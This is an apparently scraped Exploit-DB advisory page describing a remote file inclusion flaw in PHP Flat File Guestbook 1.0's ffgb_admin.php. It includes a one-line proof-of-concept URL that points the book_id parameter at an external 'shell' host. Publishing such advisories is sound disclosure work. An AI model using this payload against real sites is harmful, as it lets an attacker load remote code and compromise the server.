Lucene search

K
exploitdbRiRes WalidEDB-ID:36044
HistoryAug 11, 2011 - 12:00 a.m.

PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion

2011-08-1100:00:00
RiRes Walid
www.exploit-db.com
20

7.4 High

AI Score

Confidence

Low

source: https://www.securityfocus.com/bid/49138/info

PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell? 

7.4 High

AI Score

Confidence

Low